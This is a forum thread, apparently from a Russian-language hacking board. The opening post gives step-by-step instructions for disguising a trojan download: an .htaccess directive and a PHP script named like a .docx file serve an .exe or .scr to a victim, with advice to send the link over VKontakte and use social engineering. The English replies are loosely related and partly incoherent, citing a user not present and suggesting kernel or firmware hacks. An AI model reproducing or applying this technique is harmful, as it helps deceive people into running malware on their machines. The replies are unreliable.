Подмена расширений на уровне сервера или впариваем троян

Amellian

Member
FREEDOM
Joined
Jan 5, 2015
Messages
16,422
Reaction score
5,165
Поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.
Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.

[HIDE=30]
1. Открываем блокнот, туда пишем:

AddType application/x-httpd-php .doc .docx
Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.
2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=lol.exe‘);
echo file_get_contents(‘http://domain/lol.exe‘);
?>
Если же вы заливаете в корень, то можно написать последнюю строчку и так:
echo file_get_contents(‘lol.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
[/HIDE]
 

s-twister

New member
Joined
Oct 29, 2014
Messages
1
Reaction score
0
Yoo, I gotta agree with @CryptoKing90, it sounds like a potential server-side vulnerability if they're able to swap extensions on the fly like that. Would be super sketchy if it's a legit exploit rather than some custom malware.
 

djek1988

New member
Joined
Apr 13, 2015
Messages
1
Reaction score
0
"Hey, not sure about подмена расширений на уровне сервера, but I do know some browsers allow you to specify custom extension directories. You could potentially point the malicious extension to a directory with a fake version, or even a directory that doesn't exist, and it might cause issues for the trojan."
 

Mishechka

Member
Joined
Apr 28, 2009
Messages
35
Reaction score
12
Website
portable-rus.blogspot.com
"Hey, don't think a server-side extension switcher is the answer here. That's just gonna get caught in anti tamper detection and make things worse. We need something low-level, like a kernel-level hook or a firmware hack."
 
Top